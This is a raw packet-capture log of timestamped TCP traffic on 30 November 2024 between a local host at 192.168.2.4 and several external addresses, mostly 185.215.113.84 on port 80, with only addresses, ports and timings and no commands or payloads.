                                                                                                                  Nov 30, 2024 01:55:27.245881081 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.245939016 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.246062040 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.246110916 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.246794939 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.246849060 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.246932030 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.246973038 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.247680902 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.247731924 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.247826099 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.247868061 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.248545885 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.248595953 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.248686075 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.248725891 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.249409914 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.249453068 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.249577045 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.249624968 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.250276089 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.250338078 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.250421047 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.250464916 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.251163006 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.251214027 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.251297951 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.251338005 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.252043009 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.252099037 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.252192020 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.252230883 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.252907038 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.252954960 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.253097057 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.253143072 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.253779888 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.253830910 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.253916025 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.253957987 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.254673004 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.254722118 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.254801989 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.254841089 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.255526066 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.255587101 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.255677938 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.255717039 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.256397963 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.256448030 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.256556988 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.256603003 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.257282972 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.257332087 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.257455111 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.257503033 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.258151054 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.258203983 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.258296013 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.258357048 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.259021997 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.259071112 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.259223938 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.259269953 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.259884119 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.259938955 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.260052919 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.260103941 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.260776997 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.260831118 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.260924101 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.260961056 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.261651039 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.261698961 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.261776924 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.261817932 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.290771008 CET4974480192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:27.410813093 CET804974491.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.411101103 CET4974480192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:27.411284924 CET4974480192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:27.417553902 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.417610884 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.417646885 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.417692900 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.417771101 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.417814970 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.418046951 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.418093920 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.418659925 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.418710947 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.418797016 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.418839931 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.419526100 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.419579029 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.419655085 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.419698954 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.420169115 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.420216084 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.420327902 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.420377970 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.421040058 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.421087980 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.421226978 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.421277046 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.421909094 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.421969891 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.422065020 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.422111988 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.422796011 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.422843933 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.422930002 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.422972918 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.423656940 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.423703909 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.423790932 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.423835039 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.424542904 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.424588919 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.424701929 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.424747944 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.425405025 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.425452948 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.425559044 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.425604105 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.426279068 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.426326990 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.426441908 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.426486969 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.427154064 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.427201033 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.427319050 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.427366018 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.428026915 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.428075075 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.428191900 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.428236961 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.428901911 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.428951979 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.429074049 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.429121017 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.429768085 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.429811954 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.429913044 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.429950953 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.430644035 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.430692911 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.430787086 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.430831909 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.431509018 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.431557894 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.431653023 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.431695938 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.432382107 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.432429075 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.432539940 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.432585001 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.433258057 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.433304071 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.433392048 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.433438063 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.434123039 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.434170961 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.434279919 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.434326887 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.435003042 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.435051918 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.435168982 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.435213089 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.435906887 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.435954094 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.436055899 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.436101913 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.436765909 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.436813116 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.436924934 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.436975002 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.437618017 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.437668085 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.437755108 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.437798977 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.438491106 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.438538074 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.438647032 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.438694954 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.439366102 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.439414024 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.439513922 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.439558983 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.440263033 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.440310955 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.440396070 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.440443993 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.441126108 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.441173077 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.441282988 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.441325903 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.442001104 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.442047119 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.442145109 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.442187071 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.442864895 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.442914963 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.443006992 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.443053007 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.443754911 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.443803072 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.443880081 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.443922997 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.444623947 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.444672108 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.444791079 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.444837093 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.445497036 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.445544004 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.445647955 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.445689917 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.446372986 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.446420908 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.446511030 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.446556091 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.447263956 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.447309971 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.447438002 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.447483063 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.448128939 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.448175907 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.448287010 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.448331118 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.448986053 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.449033022 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.449152946 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.449203014 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.449873924 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.449919939 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.450036049 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.450081110 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.450737000 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.450783968 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.450901031 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.450942039 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.451622963 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.451668978 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.451781988 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.451824903 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.452528000 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.452575922 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.452646971 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.452688932 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.452912092 CET405004973389.249.62.7192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.453018904 CET4973340500192.168.2.489.249.62.7
                                                                                                                  Nov 30, 2024 01:55:27.453366041 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.453413963 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.453517914 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.453562975 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.454255104 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.454301119 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.454396963 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.454478025 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.455122948 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.455168962 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.455286980 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.455329895 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.455996037 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.456042051 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.456170082 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.456218004 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.456862926 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.456907988 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.457021952 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.457065105 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.457731962 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.457777023 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.457894087 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.457938910 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.458620071 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.458669901 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.458769083 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.458813906 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.459496021 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.459537983 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.459659100 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.459709883 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.460369110 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.460418940 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.460508108 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.460613966 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.461246014 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.461291075 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.461437941 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.461484909 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.462110996 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.462157965 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.462249041 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.462291956 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.462975979 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.463022947 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.463093996 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.463138103 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.531117916 CET804974491.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.618918896 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.618948936 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.618964911 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.619088888 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.619196892 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.619196892 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.619800091 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.619848967 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.619908094 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.619951963 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.620706081 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.620752096 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.620778084 CET8049740185.215.113.84192.168.2.4
